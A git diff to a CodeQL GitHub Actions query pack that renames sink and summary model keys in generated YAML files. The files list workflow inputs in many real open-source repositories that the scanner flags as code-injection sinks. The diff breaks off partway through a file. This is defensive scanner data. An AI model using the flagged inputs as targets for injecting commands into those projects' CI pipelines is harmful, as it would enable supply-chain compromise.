038f92a53172..2a7c5feafead 100644 --- a/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["defectdojo/django-defectdojo/.github/workflows/release-x-manual-helm-chart.yml", "*", "input.release_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml b/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml index 6fab83acf59a..9ccb41c3a8c9 100644 --- a/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dependencytrack/dependency-track/.github/workflows/_meta-build.yaml", "*", "input.app-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml b/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml index 238856cc7b9b..b71e6c001d00 100644 --- a/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["devexpress/testcafe/.github/workflows/test-server.yml", "*", "input.test-script", "code-injection", "generated"] - ["devexpress/testcafe/.github/workflows/test-functional.yml", "*", "input.test-script", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml b/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml index 71b584f54275..ff0695c0ef25 100644 --- a/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dfhack/dfhack/.github/workflows/build-windows.yml", "*", "input.artifact-name", "code-injection", "generated"] - ["dfhack/dfhack/.github/workflows/build-windows.yml", "*", "input.append-date-and-hash", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml b/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml index 1aa154828876..9576ce3892a9 100644 --- a/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["docker/build-push-action/.github/workflows/.e2e-run.yml", "*", "input.id", "code-injection", "generated"] - ["docker/build-push-action/.github/workflows/.e2e-run.yml", "*", "input.type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml b/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml index 89dd705f5903..b78d61184114 100644 --- a/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dragonwell-project/dragonwell11/.github/workflows/test.yml", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml b/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml index eb57c708bf53..cbe56806056b 100644 --- a/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "input.BINARY", "code-injection", "generated"] - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "input.SUDO", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml index 048a753c553f..391bbc6aacb9 100644 --- a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["eclipse-vertx/vert.x/.github/workflows/ci.yml", "*", "input.profile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml index 739f6a546b2d..f8b490726da9 100644 --- a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["eclipse-vertx/vertx-sql-client/.github/workflows/ci.yml", "*", "input.profile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml b/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml index f6c2769caaf9..889499eea3d3 100644 --- a/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["elastic/elasticsearch-net/.github/workflows/release.yml", "*", "input.solution", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml b/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml index 4d104c74c667..2dce19050ed7 100644 --- a/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["element-hq/element-desktop/.github/workflows/build_windows.yaml", "*", "input.version", "code-injection", "generated"] - ["element-hq/element-desktop/.github/workflows/build_prepare.yaml", "*", "input.config", "code-injection", "generated"] @@ -11,6 +11,6 @@ extensions: - ["element-hq/element-desktop/.github/workflows/build_linux.yaml", "*", "input.version", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["element-hq/element-desktop/.github/workflows/build_prepare.yaml", "*", "input.deploy", "output.deploy", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml b/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml index 2a9e2f9fd1ab..c80f8e732b64 100644 --- a/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["envoyproxy/envoy/.github/workflows/_load.yml", "*", "input.run-id", "output.run-id", "taint", "manual"] - ["envoyproxy/envoy/.github/workflows/_load.yml", "*", "input.check-name", "output.check-name", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml b/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml index 9f56abf2858b..b85a11d81f2e 100644 --- a/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["etcd-io/bbolt/.github/workflows/robustness_template.yaml", "*", "input.testTimeout", "code-injection", "generated"] - ["etcd-io/bbolt/.github/workflows/robustness_template.yaml", "*", "input.count", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml b/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml index 8c73342d5fe3..f8102400cc72 100644 --- a/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["etcd-io/etcd/.github/workflows/tests-template.yaml", "*", "input.arch", "code-injection", "generated"] - ["etcd-io/etcd/.github/workflows/robustness-template.yaml", "*", "input.scenario", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml b/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml index 87253d882243..1af7b8322035 100644 --- a/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["eventstore/eventstore/.github/workflows/build-reusable.yml", "*", "input.arch", "code-injection", "generated"] - ["eventstore/eventstore/.github/workflows/build-container-reusable.yml", "*", "input.container-runtime", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml b/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml index 9eb4c17cd3a8..c0688a4a5e06 100644 --- a/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["expensify/app/.github/workflows/e2ePerformanceTests.yml", "*", "input.PR_NUMBER", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml b/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml index 860dcdcb43d4..4e91308a0049 100644 --- a/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["external-secrets/external-secrets/.github/workflows/publish.yml", "*", "input.image-tag", "code-injection", "generated"] - ["external-secrets/external-secrets/.github/workflows/publish.yml", "*", "input.tag-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml b/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml index 539edcd58916..bc42c619599d 100644 --- a/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["facebook/create-react-app/.github/workflows/e2e-base.yml", "*", "input.testScript", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml b/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml index b1b37d967e9a..68925b294bb6 100644 --- a/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "input.aws_s3_cp_extra_args", "code-injection", "generated"] - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "input.s3_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml b/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml index 51691edc1f97..c3ff42ed6049 100644 --- a/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["falcosecurity/falco/.github/workflows/reusable_build_packages.yaml", "*", "input.build_type", "code-injection", "generated"] - ["falcosecurity/falco/.github/workflows/reusable_build_packages.yaml", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml b/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml index 3a14f6a879d5..964436f33ca8 100644 --- a/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["fastify/fastify/.github/workflows/citgm-package.yml", "*", "input.package", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml b/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml index c7f84e83db5a..995940550e19 100644 --- a/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ferretdb/ferretdb/.github/workflows/_integration.yml", "*", "input.task", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml b/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml index 72383be71ca2..93653f07819e 100644 --- a/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["filecoin-project/venus/.github/workflows/common_go.yml", "*", "input.test_timeout", "code-injection", "generated"] - ["filecoin-project/venus/.github/workflows/common_go.yml", "*", "input.log_level", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml b/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml index 8b05adf053ea..961070778cfd 100644 --- a/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "input.triggered_by_callable", "code-injection", "generated"] - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "input.package_version_number", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml b/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml index 9eec959ade3a..9f1cc82523cc 100644 --- a/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["flarum/framework/.github/workflows/REUSABLE_backend.yml", "*", "input.monorepo_tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml b/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml index 835301ecc73a..68babc09b6a1 100644 --- a/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["fluent/fluent-bit/.github/workflows/call-windows-unit-tests.yaml", "*", "input.unstable", "code-injection", "generated"] - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.the_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml b/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml index 9a99588239ee..f4271e5424b1 100644 --- a/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["flux-iac/tofu-controller/.github/workflows/targeted-test.yaml", "*", "input.pattern", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml b/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml index 12c370b33ada..f20f7997d3c4 100644 --- a/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["flyteorg/flyte/.github/workflows/publish.yml", "*", "input.before-build", "code-injection", "generated"] - ["flyteorg/flyte/.github/workflows/integration.yml", "*", "input.component", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml b/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml index 0e03216fc698..da5617fd144d 100644 --- a/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "input.org", "code-injection", "generated"] - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "input.solution", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml b/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml index 081378c96179..78821b4dad3c 100644 --- a/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["freecad/freecad/.github/workflows/sub_wrapup.yml", "*", "input.previousSteps", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml b/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml index fcd9c2929013..f0c9290ca22e 100644 --- a/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "input.output-path", "code-injection", "generated"] - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "input.settings", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml b/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml index 19822c29fcda..21d236989316 100644 --- a/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["getporter/porter/.github/workflows/build_pipelinesrelease_template.yml", "*", "input.registry", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml index d0ccde698b1a..ac38cac602d5 100644 --- a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["getsentry/sentry-dart/.github/workflows/analyze.yml", "*", "input.panaThreshold", "code-injection", "generated"] - ["getsentry/sentry-dart/.github/workflows/analyze.yml", "*", "input.sdk", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml index 027da83e922d..a9f87db955ea 100644 --- a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["getsentry/sentry-unity/.github/workflows/sdk.yml", "*", "input.target", "code-injection", "generated"] - ["getsentry/sentry-unity/.github/workflows/android-smoke-test.yml", "*", "input.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml b/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml index a914aa631c3d..99c706b0c28b 100644 --- a/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gitpod-io/gitpod/.github/workflows/jetbrains-auto-update-template.yml", "*", "input.productId", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml b/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml index d0fe6b0eff5a..f8d0172d684b 100644 --- a/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gittools/gitversion/.github/workflows/_artifacts_linux.yml", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml index 3d3a4de2946a..5afda471f8b7 100644 --- a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["googlecloudplatform/magic-modules/.github/workflows/build-downstream.yml", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml index 4c58af6969dc..4e5ca50ccec1 100644 --- a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["googlecloudplatform/nodejs-docs-samples/.github/workflows/test.yaml", "*", "input.path", "code-injection", "generated"] - ["googlecloudplatform/nodejs-docs-samples/.github/workflows/test.yaml", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml b/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml index 8629f279891a..02801615bd51 100644 --- a/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gravitational/teleport/.github/workflows/update-ami-ids.yaml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml b/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml index 4a6bbd77ec97..d808d612857f 100644 --- a/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gravitl/netmaker/.github/workflows/publish-docker.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml b/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml index c22998ee52a4..e543dc8b7f34 100644 --- a/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "input.build-version", "code-injection", "generated"] - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "input.wave-app-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml b/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml index c74922e61dc0..891d902f4709 100644 --- a/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hadashia/vcontainer/.github/workflows/update-version-number.yaml", "*", "input.dry-run", "code-injection", "generated"] - ["hadashia/vcontainer/.github/workflows/update-version-number.yaml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml b/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml index c9c7e8318f7e..334d64dfbece 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml", "*", "input.version", "output.docker-image-tag", "taint", "manual"] - ["hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml", "*", "input.version", "output.docker-image", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml index 169094c3eb38..2c600cd7f7d3 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/boundary/.github/workflows/test-cli-ui_oss.yml", "*", "input.artifact-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml index 6e4e4f4f1e90..cc6c4e620e60 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: 